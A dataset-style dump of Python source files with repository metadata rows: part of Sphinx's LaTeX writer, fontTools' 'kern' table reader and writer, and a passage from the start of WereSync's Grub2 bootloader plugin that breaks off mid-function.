self.body.append(CR + r'\begin{sphinxadmonition}{%s}{%s:}' %
(node.tagname, label))
self.no_latex_floats += 1
def _depart_named_admonition(self, node: Element) -> None:
self.body.append(r'\end{sphinxadmonition}' + CR)
self.no_latex_floats -= 1
visit_attention = _visit_named_admonition
depart_attention = _depart_named_admonition
visit_caution = _visit_named_admonition
depart_caution = _depart_named_admonition
visit_danger = _visit_named_admonition
depart_danger = _depart_named_admonition
visit_error = _visit_named_admonition
depart_error = _depart_named_admonition
visit_hint = _visit_named_admonition
depart_hint = _depart_named_admonition
visit_important = _visit_named_admonition
depart_important = _depart_named_admonition
visit_note = _visit_named_admonition
depart_note = _depart_named_admonition
visit_tip = _visit_named_admonition
depart_tip = _depart_named_admonition
visit_warning = _visit_named_admonition
depart_warning = _depart_named_admonition
def visit_versionmodified(self, node: Element) -> None:
pass
def depart_versionmodified(self, node: Element) -> None:
pass
def visit_target(self, node: Element) -> None:
def add_target(id: str) -> None:
# indexing uses standard LaTeX index markup, so the targets
# will be generated differently
if id.startswith('index-'):
return
# equations also need no extra blank line nor hypertarget
# TODO: fix this dependency on mathbase extension internals
if id.startswith('equation-'):
return
# insert blank line, if the target follows a paragraph node
index = node.parent.index(node)
if index > 0 and isinstance(node.parent[index - 1], nodes.paragraph):
self.body.append(CR)
# do not generate \phantomsection in \section{}
anchor = not self.in_title
self.body.append(self.hypertarget(id, anchor=anchor))
# skip if visitor for next node supports hyperlink
next_node: Node = node
while isinstance(next_node, nodes.target):
next_node = next_node.next_node(ascend=True)
domain = cast(StandardDomain, self.builder.env.get_domain('std'))
if isinstance(next_node, HYPERLINK_SUPPORT_NODES):
return
if domain.get_enumerable_node_type(next_node) and domain.get_numfig_title(next_node):
return
if 'refuri' in node:
return
if 'anonymous' in node:
return
if node.get('refid'):
prev_node = get_prev_node(node)
if isinstance(prev_node, nodes.reference) and node['refid'] == prev_node['refid']:
# a target for a hyperlink reference having alias
pass
else:
add_target(node['refid'])
# Temporary fix for https://github.com/sphinx-doc/sphinx/issues/11093
# TODO: investigate if a more elegant solution exists (see comments of #11093)
if node.get('ismod', False):
# Detect if the previous nodes are label targets. If so, remove
# the refid thereof from node['ids'] to avoid duplicated ids.
def has_dup_label(sib: Node | None) -> bool:
return isinstance(sib, nodes.target) and sib.get('refid') in node['ids']
prev = get_prev_node(node)
if has_dup_label(prev):
ids = node['ids'][:] # copy to avoid side-effects
while has_dup_label(prev):
ids.remove(prev['refid']) # type: ignore[index]
prev = get_prev_node(prev) # type: ignore[arg-type]
else:
ids = iter(node['ids']) # read-only iterator
else:
ids = iter(node['ids']) # read-only iterator
for id in ids:
add_target(id)
def depart_target(self, node: Element) -> None:
pass
def visit_attribution(self, node: Element) -> None:
self.body.append(CR + r'\begin{flushright}' + CR)
self.body.append('---')
def depart_attribution(self, node: Element) -> None:
self.body.append(CR + r'\end{flushright}' + CR)
def visit_index(self, node: Element) -> None:
def escape(value: str) -> str:
value = self.encode(value)
value = value.replace(r'\{', r'\sphinxleftcurlybrace{}')
value = value.replace(r'\}', r'\sphinxrightcurlybrace{}')
value = value.replace('"', '""')
value = value.replace('@', '"@')
value = value.replace('!', '"!')
value = value.replace('|', r'\textbar{}')
return value
def style(string: str) -> str:
match = EXTRA_RE.match(string)
if match:
return match.expand(r'\\spxentry{\1}\\spxextra{\2}')
else:
return r'\spxentry{%s}' % string
if not node.get('inline', True):
self.body.append(CR)
entries = node['entries']
for type, string, _tid, ismain, _key in entries:
m = ''
if ismain:
m = '|spxpagem'
try:
parts = tuple(map(escape, split_index_msg(type, string)))
styled = tuple(map(style, parts))
if type == 'single':
try:
p1, p2 = parts
P1, P2 = styled
self.body.append(fr'\index{{{p1}@{P1}!{p2}@{P2}{m}}}')
except ValueError:
p, = parts
P, = styled
self.body.append(fr'\index{{{p}@{P}{m}}}')
elif type == 'pair':
p1, p2 = parts
P1, P2 = styled
self.body.append(fr'\index{{{p1}@{P1}!{p2}@{P2}{m}}}'
fr'\index{{{p2}@{P2}!{p1}@{P1}{m}}}')
elif type == 'triple':
p1, p2, p3 = parts
P1, P2, P3 = styled
self.body.append(
fr'\index{{{p1}@{P1}!{p2} {p3}@{P2} {P3}{m}}}'
fr'\index{{{p2}@{P2}!{p3}, {p1}@{P3}, {P1}{m}}}'
fr'\index{{{p3}@{P3}!{p1} {p2}@{P1} {P2}{m}}}')
elif type in {'see', 'seealso'}:
p1, p2 = parts
P1, _P2 = styled
self.body.append(fr'\index{{{p1}@{P1}|see{{{p2}}}}}')
else:
logger.warning(__('unknown index entry type %s found'), type)
except ValueError as err:
logger.warning(str(err))
if not node.get('inline', True):
self.body.append(r'\ignorespaces ')
raise nodes.SkipNode
def visit_raw(self, node: Element) -> None:
if not self.is_inline(node):
self.body.append(CR)
if 'latex' in node.get('format', '').split():
self.body.append(node.astext())
if not self.is_inline(node):
self.body.append(CR)
raise nodes.SkipNode
def visit_reference(self, node: Element) -> None:
if not self.in_title:
for id in node.get('ids'):
anchor = not self.in_caption
self.body += self.hypertarget(id, anchor=anchor)
if not self.is_inline(node):
self.body.append(CR)
uri = node.get('refuri', '')
if not uri and node.get('refid'):
uri = '%' + self.curfilestack[-1] + '#' + node['refid']
if self.in_title or not uri:
self.context.append('')
elif uri.startswith('#'):
# references to labels in the same document
id = self.curfilestack[-1] + ':' + uri[1:]
self.body.append(self.hyperlink(id))
self.body.append(r'\sphinxsamedocref{')
if self.config.latex_show_pagerefs and not \
self.in_production_list:
self.context.append('}}} (%s)' % self.hyperpageref(id))
else:
self.context.append('}}}')
elif uri.startswith('%'):
# references to documents or labels inside documents
hashindex = uri.find('#')
if hashindex == -1:
# reference to the document
id = uri[1:] + '::doc'
else:
# reference to a label
id = uri[1:].replace('#', ':')
self.body.append(self.hyperlink(id))
if (len(node) and
isinstance(node[0], nodes.Element) and
'std-term' in node[0].get('classes', [])):
# don't add a pageref for glossary terms
self.context.append('}}}')
# mark up as termreference
self.body.append(r'\sphinxtermref{')
else:
self.body.append(r'\sphinxcrossref{')
if self.config.latex_show_pagerefs and not self.in_production_list:
self.context.append('}}} (%s)' % self.hyperpageref(id))
else:
self.context.append('}}}')
else:
if len(node) == 1 and uri == node[0]:
if node.get('nolinkurl'):
self.body.append(r'\sphinxnolinkurl{%s}' % self.encode_uri(uri))
else:
self.body.append(r'\sphinxurl{%s}' % self.encode_uri(uri))
raise nodes.SkipNode
else:
self.body.append(r'\sphinxhref{%s}{' % self.encode_uri(uri))
self.context.append('}')
def depart_reference(self, node: Element) -> None:
self.body.append(self.context.pop())
if not self.is_inline(node):
self.body.append(CR)
def visit_number_reference(self, node: Element) -> None:
if node.get('refid'):
id = self.curfilestack[-1] + ':' + node['refid']
else:
id = node.get('refuri', '')[1:].replace('#', ':')
title = self.escape(node.get('title', '%s')).replace(r'\%s', '%s')
if r'\{name\}' in title or r'\{number\}' in title:
# new style format (cf. "Fig.%{number}")
title = title.replace(r'\{name\}', '{name}').replace(r'\{number\}', '{number}')
text = escape_abbr(title).format(name=r'\nameref{%s}' % self.idescape(id),
number=r'\ref{%s}' % self.idescape(id))
else:
# old style format (cf. "Fig.%{number}")
text = escape_abbr(title) % (r'\ref{%s}' % self.idescape(id))
hyperref = fr'\hyperref[{self.idescape(id)}]{{{text}}}'
self.body.append(hyperref)
raise nodes.SkipNode
def visit_download_reference(self, node: Element) -> None:
pass
def depart_download_reference(self, node: Element) -> None:
pass
def visit_pending_xref(self, node: Element) -> None:
pass
def depart_pending_xref(self, node: Element) -> None:
pass
def visit_emphasis(self, node: Element) -> None:
self.body.append(r'\sphinxstyleemphasis{')
def depart_emphasis(self, node: Element) -> None:
self.body.append('}')
def visit_literal_emphasis(self, node: Element) -> None:
self.body.append(r'\sphinxstyleliteralemphasis{\sphinxupquote{')
def depart_literal_emphasis(self, node: Element) -> None:
self.body.append('}}')
def visit_strong(self, node: Element) -> None:
self.body.append(r'\sphinxstylestrong{')
def depart_strong(self, node: Element) -> None:
self.body.append('}')
def visit_literal_strong(self, node: Element) -> None:
self.body.append(r'\sphinxstyleliteralstrong{\sphinxupquote{')
def depart_literal_strong(self, node: Element) -> None:
self.body.append('}}')
def visit_abbreviation(self, node: Element) -> None:
abbr = node.astext()
self.body.append(r'\sphinxstyleabbreviation{')
# spell out the explanation once
if node.hasattr('explanation') and abbr not in self.handled_abbrs:
self.context.append('} (%s)' % self.encode(node['explanation']))
self.handled_abbrs.add(abbr)
else:
self.context.append('}')
def depart_abbreviation(self, node: Element) -> None:
self.body.append(self.context.pop())
def visit_manpage(self, node: Element) -> None:
return self.visit_literal_emphasis(node)
def depart_manpage(self, node: Element) -> None:
return self.depart_literal_emphasis(node)
def visit_title_reference(self, node: Element) -> None:
self.body.append(r'\sphinxtitleref{')
def depart_title_reference(self, node: Element) -> None:
self.body.append('}')
def visit_thebibliography(self, node: Element) -> None:
citations = cast(Iterable[nodes.citation], node)
labels = (cast(nodes.label, citation[0]) for citation in citations)
longest_label = max((label.astext() for label in labels), key=len)
if len(longest_label) > MAX_CITATION_LABEL_LENGTH:
# adjust max width of citation labels not to break the layout
longest_label = longest_label[:MAX_CITATION_LABEL_LENGTH]
self.body.append(CR + r'\begin{sphinxthebibliography}{%s}' %
self.encode(longest_label) + CR)
def depart_thebibliography(self, node: Element) -> None:
self.body.append(r'\end{sphinxthebibliography}' + CR)
def visit_citation(self, node: Element) -> None:
label = cast(nodes.label, node[0])
self.body.append(fr'\bibitem[{self.encode(label.astext())}]'
fr'{{{node["docname"]}:{node["ids"][0]}}}')
def depart_citation(self, node: Element) -> None:
pass
def visit_citation_reference(self, node: Element) -> None:
if self.in_title:
pass
else:
self.body.append(fr'\sphinxcite{{{node["docname"]}:{node["refname"]}}}')
raise nodes.SkipNode
def depart_citation_reference(self, node: Element) -> None:
pass
def visit_literal(self, node: Element) -> None:
if self.in_title:
self.body.append(r'\sphinxstyleliteralintitle{\sphinxupquote{')
return
elif 'kbd' in node['classes']:
self.body.append(r'\sphinxkeyboard{\sphinxupquote{')
return
lang = node.get("language", None)
if 'code' not in node['classes'] or not lang:
self.body.append(r'\sphinxcode{\sphinxupquote{')
return
opts = self.config.highlight_options.get(lang, {})
hlcode = self.highlighter.highlight_block(
node.astext(), lang, opts=opts, location=node, nowrap=True)
self.body.append(r'\sphinxcode{\sphinxupquote{%' + CR
+ hlcode.rstrip() + '%' + CR
+ '}}')
raise nodes.SkipNode
def depart_literal(self, node: Element) -> None:
self.body.append('}}')
def visit_footnote_reference(self, node: Element) -> None:
raise nodes.SkipNode
def visit_footnotemark(self, node: Element) -> None:
self.body.append(r'\sphinxfootnotemark[')
def depart_footnotemark(self, node: Element) -> None:
self.body.append(']')
def visit_footnotetext(self, node: Element) -> None:
label = cast(nodes.label, node[0])
self.body.append('%' + CR)
self.body.append(r'\begin{footnotetext}[%s]' % label.astext())
self.body.append(r'\sphinxAtStartFootnote' + CR)
def depart_footnotetext(self, node: Element) -> None:
# the \ignorespaces in particular for after table header use
self.body.append('%' + CR)
self.body.append(r'\end{footnotetext}\ignorespaces ')
def visit_captioned_literal_block(self, node: Element) -> None:
pass
def depart_captioned_literal_block(self, node: Element) -> None:
pass
def visit_literal_block(self, node: Element) -> None:
if node.rawsource != node.astext():
# most probably a parsed-literal block -- don't highlight
self.in_parsed_literal += 1
self.body.append(r'\begin{sphinxalltt}' + CR)
else:
labels = self.hypertarget_to(node)
if isinstance(node.parent, captioned_literal_block):
labels += self.hypertarget_to(node.parent)
if labels and not self.in_footnote:
self.body.append(CR + r'\def\sphinxLiteralBlockLabel{' + labels + '}')
lang = node.get('language', 'default')
linenos = node.get('linenos', False)
highlight_args = node.get('highlight_args', {})
highlight_args['force'] = node.get('force', False)
opts = self.config.highlight_options.get(lang, {})
hlcode = self.highlighter.highlight_block(
node.rawsource, lang, opts=opts, linenos=linenos,
location=node, **highlight_args,
)
if self.in_footnote:
self.body.append(CR + r'\sphinxSetupCodeBlockInFootnote')
hlcode = hlcode.replace(r'\begin{Verbatim}',
r'\begin{sphinxVerbatim}')
# if in table raise verbatim flag to avoid "tabulary" environment
# and opt for sphinxVerbatimintable to handle caption & long lines
elif self.table:
self.table.has_problematic = True
self.table.has_verbatim = True
hlcode = hlcode.replace(r'\begin{Verbatim}',
r'\begin{sphinxVerbatimintable}')
else:
hlcode = hlcode.replace(r'\begin{Verbatim}',
r'\begin{sphinxVerbatim}')
# get consistent trailer
hlcode = hlcode.rstrip()[:-14] # strip \end{Verbatim}
if self.table and not self.in_footnote:
hlcode += r'\end{sphinxVerbatimintable}'
else:
hlcode += r'\end{sphinxVerbatim}'
hllines = str(highlight_args.get('hl_lines', []))[1:-1]
if hllines:
self.body.append(CR + r'\fvset{hllines={, %s,}}%%' % hllines)
self.body.append(CR + hlcode + CR)
if hllines:
self.body.append(r'\sphinxresetverbatimhllines' + CR)
raise nodes.SkipNode
def depart_literal_block(self, node: Element) -> None:
self.body.append(CR + r'\end{sphinxalltt}' + CR)
self.in_parsed_literal -= 1
visit_doctest_block = visit_literal_block
depart_doctest_block = depart_literal_block
def visit_line(self, node: Element) -> None:
self.body.append(r'\item[] ')
def depart_line(self, node: Element) -> None:
self.body.append(CR)
def visit_line_block(self, node: Element) -> None:
if isinstance(node.parent, nodes.line_block):
self.body.append(r'\item[]' + CR)
self.body.append(r'\begin{DUlineblock}{\DUlineblockindent}' + CR)
else:
self.body.append(CR + r'\begin{DUlineblock}{0em}' + CR)
if self.table:
self.table.has_problematic = True
def depart_line_block(self, node: Element) -> None:
self.body.append(r'\end{DUlineblock}' + CR)
def visit_block_quote(self, node: Element) -> None:
# If the block quote contains a single object and that object
# is a list, then generate a list not a block quote.
# This lets us indent lists.
done = 0
if len(node.children) == 1:
child = node.children[0]
if isinstance(child, (nodes.bullet_list, nodes.enumerated_list)):
done = 1
if not done:
self.body.append(r'\begin{quote}' + CR)
if self.table:
self.table.has_problematic = True
def depart_block_quote(self, node: Element) -> None:
done = 0
if len(node.children) == 1:
child = node.children[0]
if isinstance(child, (nodes.bullet_list, nodes.enumerated_list)):
done = 1
if not done:
self.body.append(r'\end{quote}' + CR)
# option node handling copied from docutils' latex writer
def visit_option(self, node: Element) -> None:
if self.context[-1]:
# this is not the first option
self.body.append(', ')
def depart_option(self, node: Element) -> None:
# flag that the first option is done.
self.context[-1] += 1
def visit_option_argument(self, node: Element) -> None:
"""The delimiter between an option and its argument."""
self.body.append(node.get('delimiter', ' '))
def depart_option_argument(self, node: Element) -> None:
pass
def visit_option_group(self, node: Element) -> None:
self.body.append(r'\item [')
# flag for first option
self.context.append(0)
def depart_option_group(self, node: Element) -> None:
self.context.pop() # the flag
self.body.append('] ')
def visit_option_list(self, node: Element) -> None:
self.body.append(r'\begin{optionlist}{3cm}' + CR)
if self.table:
self.table.has_problematic = True
def depart_option_list(self, node: Element) -> None:
self.body.append(r'\end{optionlist}' + CR)
def visit_option_list_item(self, node: Element) -> None:
pass
def depart_option_list_item(self, node: Element) -> None:
pass
def visit_option_string(self, node: Element) -> None:
ostring = node.astext()
self.body.append(self.encode(ostring))
raise nodes.SkipNode
def visit_description(self, node: Element) -> None:
self.body.append(' ')
def depart_description(self, node: Element) -> None:
pass
def visit_superscript(self, node: Element) -> None:
self.body.append(r'$^{\text{')
def depart_superscript(self, node: Element) -> None:
self.body.append('}}$')
def visit_subscript(self, node: Element) -> None:
self.body.append(r'$_{\text{')
def depart_subscript(self, node: Element) -> None:
self.body.append('}}$')
def visit_inline(self, node: Element) -> None:
classes = node.get('classes', [])
if classes in [['menuselection']]:
self.body.append(r'\sphinxmenuselection{')
self.context.append('}')
elif classes in [['guilabel']]:
self.body.append(r'\sphinxguilabel{')
self.context.append('}')
elif classes in [['accelerator']]:
self.body.append(r'\sphinxaccelerator{')
self.context.append('}')
elif classes and not self.in_title:
self.body.append(r'\DUrole{%s}{' % ','.join(classes))
self.context.append('}')
else:
self.context.append('')
def depart_inline(self, node: Element) -> None:
self.body.append(self.context.pop())
def visit_generated(self, node: Element) -> None:
pass
def depart_generated(self, node: Element) -> None:
pass
def visit_compound(self, node: Element) -> None:
pass
def depart_compound(self, node: Element) -> None:
pass
def visit_container(self, node: Element) -> None:
classes = node.get('classes', [])
for c in classes:
self.body.append('\n\\begin{sphinxuseclass}{%s}' % c)
def depart_container(self, node: Element) -> None:
classes = node.get('classes', [])
for _c in classes:
self.body.append('\n\\end{sphinxuseclass}')
def visit_decoration(self, node: Element) -> None:
pass
def depart_decoration(self, node: Element) -> None:
pass
# docutils-generated elements that we don't support
def visit_header(self, node: Element) -> None:
raise nodes.SkipNode
def visit_footer(self, node: Element) -> None:
raise nodes.SkipNode
def visit_docinfo(self, node: Element) -> None:
raise nodes.SkipNode
# text handling
def encode(self, text: str) -> str:
text = self.escape(text)
if self.literal_whitespace:
# Insert a blank before the newline, to avoid
# ! LaTeX Error: There's no line here to end.
text = text.replace(CR, r'~\\' + CR).replace(' ', '~')
return text
def encode_uri(self, text: str) -> str:
# TODO: it is probably wrong that this uses texescape.escape()
# this must be checked against hyperref package exact dealings
# mainly, %, #, {, } and \ need escaping via a \ escape
# in \href, the tilde is allowed and must be represented literally
return self.encode(text).replace(r'\textasciitilde{}', '~').\
replace(r'\sphinxhyphen{}', '-').\
replace(r'\textquotesingle{}', "'")
def visit_Text(self, node: Text) -> None:
text = self.encode(node.astext())
self.body.append(text)
def depart_Text(self, node: Text) -> None:
pass
def visit_comment(self, node: Element) -> None:
raise nodes.SkipNode
def visit_meta(self, node: Element) -> None:
# only valid for HTML
raise nodes.SkipNode
def visit_system_message(self, node: Element) -> None:
pass
def depart_system_message(self, node: Element) -> None:
self.body.append(CR)
def visit_math(self, node: Element) -> None:
if self.in_title:
self.body.append(r'\protect\(%s\protect\)' % node.astext())
else:
self.body.append(r'\(%s\)' % node.astext())
raise nodes.SkipNode
def visit_math_block(self, node: Element) -> None:
if node.get('label'):
label = f"equation:{node['docname']}:{node['label']}"
else:
label = None
if node.get('nowrap'):
if label:
self.body.append(r'\label{%s}' % label)
self.body.append(node.astext())
else:
from sphinx.util.math import wrap_displaymath
self.body.append(wrap_displaymath(node.astext(), label,
self.config.math_number_all))
raise nodes.SkipNode
def visit_math_reference(self, node: Element) -> None:
label = f"equation:{node['docname']}:{node['target']}"
eqref_format = self.config.math_eqref_format
if eqref_format:
try:
ref = r'\ref{%s}' % label
self.body.append(eqref_format.format(number=ref))
except KeyError as exc:
logger.warning(__('Invalid math_eqref_format: %r'), exc,
location=node)
self.body.append(r'\eqref{%s}' % label)
else:
self.body.append(r'\eqref{%s}' % label)
def depart_math_reference(self, node: Element) -> None:
pass
# FIXME: Workaround to avoid circular import
# refs: https://github.com/sphinx-doc/sphinx/issues/5433
from sphinx.builders.latex.nodes import ( # noqa: E402 # isort:skip
HYPERLINK_SUPPORT_NODES, captioned_literal_block, footnotetext,
)
|
f2db591789c6d0851466feeddd3e11a89130f612
|
010279e2ba272d09e9d2c4e903722e5faba2cf7a
|
/contrib/python/fonttools/fontTools/ttLib/tables/_k_e_r_n.py
|
94183c8a0a1e8a02cfc229d525030d9ae2b27ddf
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"OFL-1.1",
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
catboost/catboost
|
854c1a1f439a96f1ae6b48e16644be20aa04dba2
|
f5042e35b945aded77b23470ead62d7eacefde92
|
refs/heads/master
| 2023-09-01T12:14:14.174108
| 2023-09-01T10:01:01
| 2023-09-01T10:22:12
| 97,556,265
| 8,012
| 1,425
|
Apache-2.0
| 2023-09-11T03:32:32
| 2017-07-18T05:29:04
|
Python
|
UTF-8
|
Python
| false
| false
| 10,436
|
py
|
_k_e_r_n.py
|
from fontTools.ttLib import getSearchRange
from fontTools.misc.textTools import safeEval, readHex
from fontTools.misc.fixedTools import fixedToFloat as fi2fl, floatToFixed as fl2fi
from . import DefaultTable
import struct
import sys
import array
import logging
log = logging.getLogger(__name__)
class table__k_e_r_n(DefaultTable.DefaultTable):
def getkern(self, format):
for subtable in self.kernTables:
if subtable.format == format:
return subtable
return None # not found
def decompile(self, data, ttFont):
version, nTables = struct.unpack(">HH", data[:4])
apple = False
if (len(data) >= 8) and (version == 1):
# AAT Apple's "new" format. Hm.
version, nTables = struct.unpack(">LL", data[:8])
self.version = fi2fl(version, 16)
data = data[8:]
apple = True
else:
self.version = version
data = data[4:]
self.kernTables = []
for i in range(nTables):
if self.version == 1.0:
# Apple
length, coverage, subtableFormat = struct.unpack(">LBB", data[:6])
else:
# in OpenType spec the "version" field refers to the common
# subtable header; the actual subtable format is stored in
# the 8-15 mask bits of "coverage" field.
# This "version" is always 0 so we ignore it here
_, length, subtableFormat, coverage = struct.unpack(">HHBB", data[:6])
if nTables == 1 and subtableFormat == 0:
# The "length" value is ignored since some fonts
# (like OpenSans and Calibri) have a subtable larger than
# its value.
(nPairs,) = struct.unpack(">H", data[6:8])
calculated_length = (nPairs * 6) + 14
if length != calculated_length:
log.warning(
"'kern' subtable longer than defined: "
"%d bytes instead of %d bytes" % (calculated_length, length)
)
length = calculated_length
if subtableFormat not in kern_classes:
subtable = KernTable_format_unkown(subtableFormat)
else:
subtable = kern_classes[subtableFormat](apple)
subtable.decompile(data[:length], ttFont)
self.kernTables.append(subtable)
data = data[length:]
def compile(self, ttFont):
if hasattr(self, "kernTables"):
nTables = len(self.kernTables)
else:
nTables = 0
if self.version == 1.0:
# AAT Apple's "new" format.
data = struct.pack(">LL", fl2fi(self.version, 16), nTables)
else:
data = struct.pack(">HH", self.version, nTables)
if hasattr(self, "kernTables"):
for subtable in self.kernTables:
data = data + subtable.compile(ttFont)
return data
def toXML(self, writer, ttFont):
writer.simpletag("version", value=self.version)
writer.newline()
for subtable in self.kernTables:
subtable.toXML(writer, ttFont)
def fromXML(self, name, attrs, content, ttFont):
if name == "version":
self.version = safeEval(attrs["value"])
return
if name != "kernsubtable":
return
if not hasattr(self, "kernTables"):
self.kernTables = []
format = safeEval(attrs["format"])
if format not in kern_classes:
subtable = KernTable_format_unkown(format)
else:
apple = self.version == 1.0
subtable = kern_classes[format](apple)
self.kernTables.append(subtable)
subtable.fromXML(name, attrs, content, ttFont)
class KernTable_format_0(object):
# 'version' is kept for backward compatibility
version = format = 0
def __init__(self, apple=False):
self.apple = apple
def decompile(self, data, ttFont):
if not self.apple:
version, length, subtableFormat, coverage = struct.unpack(">HHBB", data[:6])
if version != 0:
from fontTools.ttLib import TTLibError
raise TTLibError("unsupported kern subtable version: %d" % version)
tupleIndex = None
# Should we also assert length == len(data)?
data = data[6:]
else:
length, coverage, subtableFormat, tupleIndex = struct.unpack(
">LBBH", data[:8]
)
data = data[8:]
assert self.format == subtableFormat, "unsupported format"
self.coverage = coverage
self.tupleIndex = tupleIndex
self.kernTable = kernTable = {}
nPairs, searchRange, entrySelector, rangeShift = struct.unpack(
">HHHH", data[:8]
)
data = data[8:]
datas = array.array("H", data[: 6 * nPairs])
if sys.byteorder != "big":
datas.byteswap()
it = iter(datas)
glyphOrder = ttFont.getGlyphOrder()
for k in range(nPairs):
left, right, value = next(it), next(it), next(it)
if value >= 32768:
value -= 65536
try:
kernTable[(glyphOrder[left], glyphOrder[right])] = value
except IndexError:
# Slower, but will not throw an IndexError on an invalid
# glyph id.
kernTable[
(ttFont.getGlyphName(left), ttFont.getGlyphName(right))
] = value
if len(data) > 6 * nPairs + 4: # Ignore up to 4 bytes excess
log.warning(
"excess data in 'kern' subtable: %d bytes", len(data) - 6 * nPairs
)
def compile(self, ttFont):
nPairs = min(len(self.kernTable), 0xFFFF)
searchRange, entrySelector, rangeShift = getSearchRange(nPairs, 6)
searchRange &= 0xFFFF
entrySelector = min(entrySelector, 0xFFFF)
rangeShift = min(rangeShift, 0xFFFF)
data = struct.pack(">HHHH", nPairs, searchRange, entrySelector, rangeShift)
# yeehee! (I mean, turn names into indices)
try:
reverseOrder = ttFont.getReverseGlyphMap()
kernTable = sorted(
(reverseOrder[left], reverseOrder[right], value)
for ((left, right), value) in self.kernTable.items()
)
except KeyError:
# Slower, but will not throw KeyError on invalid glyph id.
getGlyphID = ttFont.getGlyphID
kernTable = sorted(
(getGlyphID(left), getGlyphID(right), value)
for ((left, right), value) in self.kernTable.items()
)
for left, right, value in kernTable:
data = data + struct.pack(">HHh", left, right, value)
if not self.apple:
version = 0
length = len(data) + 6
if length >= 0x10000:
log.warning(
'"kern" subtable overflow, '
"truncating length value while preserving pairs."
)
length &= 0xFFFF
header = struct.pack(">HHBB", version, length, self.format, self.coverage)
else:
if self.tupleIndex is None:
# sensible default when compiling a TTX from an old fonttools
# or when inserting a Windows-style format 0 subtable into an
# Apple version=1.0 kern table
log.warning("'tupleIndex' is None; default to 0")
self.tupleIndex = 0
length = len(data) + 8
header = struct.pack(
">LBBH", length, self.coverage, self.format, self.tupleIndex
)
return header + data
def toXML(self, writer, ttFont):
attrs = dict(coverage=self.coverage, format=self.format)
if self.apple:
if self.tupleIndex is None:
log.warning("'tupleIndex' is None; default to 0")
attrs["tupleIndex"] = 0
else:
attrs["tupleIndex"] = self.tupleIndex
writer.begintag("kernsubtable", **attrs)
writer.newline()
items = sorted(self.kernTable.items())
for (left, right), value in items:
writer.simpletag("pair", [("l", left), ("r", right), ("v", value)])
writer.newline()
writer.endtag("kernsubtable")
writer.newline()
def fromXML(self, name, attrs, content, ttFont):
self.coverage = safeEval(attrs["coverage"])
subtableFormat = safeEval(attrs["format"])
if self.apple:
if "tupleIndex" in attrs:
self.tupleIndex = safeEval(attrs["tupleIndex"])
else:
# previous fontTools versions didn't export tupleIndex
log.warning("Apple kern subtable is missing 'tupleIndex' attribute")
self.tupleIndex = None
else:
self.tupleIndex = None
assert subtableFormat == self.format, "unsupported format"
if not hasattr(self, "kernTable"):
self.kernTable = {}
for element in content:
if not isinstance(element, tuple):
continue
name, attrs, content = element
self.kernTable[(attrs["l"], attrs["r"])] = safeEval(attrs["v"])
def __getitem__(self, pair):
return self.kernTable[pair]
def __setitem__(self, pair, value):
self.kernTable[pair] = value
def __delitem__(self, pair):
del self.kernTable[pair]
class KernTable_format_unkown(object):
def __init__(self, format):
self.format = format
def decompile(self, data, ttFont):
self.data = data
def compile(self, ttFont):
return self.data
def toXML(self, writer, ttFont):
writer.begintag("kernsubtable", format=self.format)
writer.newline()
writer.comment("unknown 'kern' subtable format")
writer.newline()
writer.dumphex(self.data)
writer.endtag("kernsubtable")
writer.newline()
def fromXML(self, name, attrs, content, ttFont):
self.decompile(readHex(content), ttFont)
kern_classes = {0: KernTable_format_0}
|
7c08ba7b137391ad74c388cc0e521aa92bf20d8a
|
0f96e82782069113767e0322cd29629503fc2aad
|
/src/weresync/plugins/weresync_grub2.py
|
5a123ee9e65f741c8b8dc7702ea24c0368cc0007
|
[
"Apache-2.0"
] |
permissive
|
DonyorM/weresync
|
f82afe39d03fd8a8f48562130ee856b2c199dfbf
|
3c0094cb386358589c48bf48cb60f20acf961f9c
|
refs/heads/master
| 2022-12-10T20:02:05.332807
| 2021-02-20T23:18:34
| 2021-02-20T23:18:34
| 72,903,177
| 225
| 19
|
Apache-2.0
| 2022-12-08T05:15:41
| 2016-11-05T03:37:34
|
Python
|
UTF-8
|
Python
| false
| false
| 6,564
|
py
|
weresync_grub2.py
|
# Copyright 2016 Daniel Manila
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Installs the Grub2 bootloader. This works on both UEFI and MBR systems."""
from weresync.plugins import IBootPlugin
import weresync.plugins as plugins
import weresync.daemon.device as device
from weresync.exception import CopyError, DeviceError
import subprocess
import os
import sys
import logging
LOGGER = logging.getLogger(__name__)
class GrubPlugin(IBootPlugin):
"""Plugin to install the grub2 bootloader. Does not install grub legacy."""
def __init__(self):
super().__init__("grub2", "Grub2")
def get_help(self):
return __doc__
def install_bootloader(self, source_mnt, target_mnt, copier,
excluded_partitions=[],
boot_partition=None, root_partition=None,
efi_partition=None):
if efi_partition is not None:
import weresync.plugins.weresync_uuid_copy as uuc
# UEFI systems tend to only need a UUID copy. No sense in not
# reusing old code.
uuc.UUIDPlugin().install_bootloader(source_mnt, target_mnt, copier,
excluded_partitions,
boot_partition,
root_partition, efi_partition)
return
if root_partition is None and boot_partition is None:
# This for loop searches for a partition with a /boot/grub folder
# and it assumes it is the root partition
for i in copier.target.get_partitions():
try:
mount_point = copier.target.mount_point(i)
if mount_point is None:
copier.target.mount_partition(i, target_mnt)
mount_point = target_mnt
if os.path.exists(mount_point +
("/" if not mount_point.endswith("/")
else "") + "boot/grub"):
root_partition = i
break
else:
copier.target.unmount_partition(i)
except DeviceError as ex:
LOGGER.warning("Could not mount partition {0}. "
"Assumed to not be the partition grub "
"is on.".format(i))
LOGGER.debug("Error info:\n", exc_info=sys.exc_info())
else: # No partition found
raise CopyError("Could not find partition with "
"'boot/grub' folder on device {0}".format(
copier.target.device))
# These variables are flags that allow the plugin to know if it mounted
# any partitions and then clean up properly if it did
mounted_here = False
boot_mounted_here = False
try:
if root_partition is not None:
mount_loc = copier.target.mount_point(root_partition)
if mount_loc is None:
plugins.mount_partition(copier.target, copier.lvm_target,
root_partition, target_mnt)
mounted_here = True
mount_loc = target_mnt
else:
mount_loc = target_mnt
# This line avoids double slashes in path
mount_loc += "/" if not mount_loc.endswith("/") else ""
if boot_partition is not None:
boot_folder = mount_loc + "boot"
if not os.path.exists(boot_folder):
os.makedirs(boot_folder)
